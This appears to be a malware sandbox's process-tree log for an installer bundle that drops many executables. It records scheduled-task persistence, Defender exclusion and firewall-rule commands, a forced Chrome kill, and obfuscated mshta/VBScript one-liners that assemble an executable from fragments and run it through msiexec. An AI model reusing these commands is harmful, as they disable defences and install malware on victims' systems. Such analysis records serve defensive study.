C:\Users\Admin\Documents\AObPKQr6Jy1q3hZNftS_2QIa.exe"C:\Users\Admin\Documents\AObPKQr6Jy1q3hZNftS_2QIa.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\TS8C7UyMm7f4cONqJ7WGeWsJ.exe"C:\Users\Admin\Pictures\Adobe Films\TS8C7UyMm7f4cONqJ7WGeWsJ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\TS8C7UyMm7f4cONqJ7WGeWsJ.exe"C:\Users\Admin\Pictures\Adobe Films\TS8C7UyMm7f4cONqJ7WGeWsJ.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\H0CeEMPSUFWGICASTuD05aaY.exe"C:\Users\Admin\Pictures\Adobe Films\H0CeEMPSUFWGICASTuD05aaY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 9003⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\1HR1MySDS9W4Xh4BuTVhlZvx.exe"C:\Users\Admin\Pictures\Adobe Films\1HR1MySDS9W4Xh4BuTVhlZvx.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\RmlYM6m_MkNIs4hsfQ2xhK0w.exe"C:\Users\Admin\Pictures\Adobe Films\RmlYM6m_MkNIs4hsfQ2xhK0w.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\gmGBSgUMC9lcooI4mBvCyD9o.exe"C:\Users\Admin\Pictures\Adobe Films\gmGBSgUMC9lcooI4mBvCyD9o.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 6763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 6803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 6923⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\7KAQ13EUayjF7l_ONZLsO4KC.exe"C:\Users\Admin\Pictures\Adobe Films\7KAQ13EUayjF7l_ONZLsO4KC.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\Y59NcCyhjTNabUyy_rSrn88j.exe"C:\Users\Admin\Pictures\Adobe Films\Y59NcCyhjTNabUyy_rSrn88j.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\VDrYzJIhYBfsOxUVjD6qOlHo.exe"C:\Users\Admin\Pictures\Adobe Films\VDrYzJIhYBfsOxUVjD6qOlHo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Users\Admin\Pictures\Adobe Films\0bB8aprULCmL4OW0bMY9mihf.exe"C:\Users\Admin\Pictures\Adobe Films\0bB8aprULCmL4OW0bMY9mihf.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\zCXMiv3RosvYx3Ad7qwEftH6.exe"C:\Users\Admin\Pictures\Adobe Films\zCXMiv3RosvYx3Ad7qwEftH6.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\XdkhZJCvff8a50yAYGJZolZJ.exe"C:\Users\Admin\Pictures\Adobe Films\XdkhZJCvff8a50yAYGJZolZJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\5uUZlD6B0cEHDSZBuDNnYK55.exe"C:\Users\Admin\Pictures\Adobe Films\5uUZlD6B0cEHDSZBuDNnYK55.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\5GRfaQA90kKihOxhbAmX5q1H.exe"C:\Users\Admin\Pictures\Adobe Films\5GRfaQA90kKihOxhbAmX5q1H.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\syotsWcKf5oS_xIcnKpHdZgl.exe"C:\Users\Admin\Pictures\Adobe Films\syotsWcKf5oS_xIcnKpHdZgl.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\cuDHLwVUXRBFsKiCmh1izlnZ.exe"C:\Users\Admin\Pictures\Adobe Films\cuDHLwVUXRBFsKiCmh1izlnZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe"C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "CwkpDrSvORlcHiAeld52hPsK.exe" -F5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\AtWo1C_0o4EgMkXZ8i70FmrD.exe"C:\Users\Admin\Pictures\Adobe Films\AtWo1C_0o4EgMkXZ8i70FmrD.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\AtWo1C_0o4EgMkXZ8i70FmrD.exe"C:\Users\Admin\Pictures\Adobe Films\AtWo1C_0o4EgMkXZ8i70FmrD.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 244⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe"C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "" == "" for %s iN ( "C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe" ) do taskkill /Im "%~Nxs" -f4⤵
-
C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF ""-pVmK5OY1Q2FwiV3_NJROp~tX8k "" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "-pVmK5OY1Q2FwiV3_NJROp~tX8k " == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ) do taskkill /Im "%~Nxs" -f7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpt: closE ( crEateOBjECT ("WsCRipT.sHELl" ).ruN( "cmD.Exe /r EchO | SEt /P = ""MZ"" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB + V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q * " ,0 , TRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r EchO | SEt /P = "MZ" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB+ V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q *7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>OoZ39QP7.Q~P"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "FhLKl5cj19hUvdWkcqQyDNUv.exe" -f5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\7AQ5wKvZuy4mxjyIRh_1ITjV.exe"C:\Users\Admin\Pictures\Adobe Films\7AQ5wKvZuy4mxjyIRh_1ITjV.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\7AQ5wKvZuy4mxjyIRh_1ITjV.exe"C:\Users\Admin\Pictures\Adobe Films\7AQ5wKvZuy4mxjyIRh_1ITjV.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\dHTl_RtE2hNmhOES7j1a4rLs.exe"C:\Users\Admin\Pictures\Adobe Films\dHTl_RtE2hNmhOES7j1a4rLs.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1e8,0x218,0x7fffa0d2dec0,0x7fffa0d2ded0,0x7fffa0d2dee05⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x11c,0x140,0x7ff76a419e70,0x7ff76a419e80,0x7ff76a419e906⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2452 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2432 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=2004 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=1992 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1944 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3240 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3364 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3480 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3848 /prefetch:85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3856 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3524 /prefetch:85⤵
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue130c270d23c79.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue130c270d23c79.exeTue130c270d23c79.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 4926⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Windows directory
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13c1be0d8f62bc.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13c1be0d8f62bc.exeTue13c1be0d8f62bc.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13d68628efddb1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13d68628efddb1.exeTue13d68628efddb1.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\pozVUN853DbpIySIENQjkgyZ.exe"C:\Users\Admin\Pictures\Adobe Films\pozVUN853DbpIySIENQjkgyZ.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gn5frZPIHvGjfBwF7Il2mnlk.exe"C:\Users\Admin\Pictures\Adobe Films\Gn5frZPIHvGjfBwF7Il2mnlk.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\uf2t2oDZV5LRLSSN6Hb8voFZ.exe"C:\Users\Admin\Pictures\Adobe Films\uf2t2oDZV5LRLSSN6Hb8voFZ.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\c1dNg7rmL7AM4CiqKD1oZyCX.exe"C:\Users\Admin\Pictures\Adobe Films\c1dNg7rmL7AM4CiqKD1oZyCX.exe"6⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\cRacS9rhR__TiismTflL68cH.exe"C:\Users\Admin\Documents\cRacS9rhR__TiismTflL68cH.exe"7⤵
- Checks computer location settings
-
